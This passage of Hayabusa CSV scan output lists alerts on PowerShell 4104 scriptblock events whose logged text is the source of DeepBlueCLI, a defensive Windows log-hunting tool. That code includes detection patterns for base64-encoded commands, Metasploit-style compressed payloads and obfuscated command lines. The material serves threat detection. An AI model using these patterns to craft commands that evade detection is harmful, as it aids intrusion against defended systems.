$output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image 
+ ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log 
""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. 
# Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach 
here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.562 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
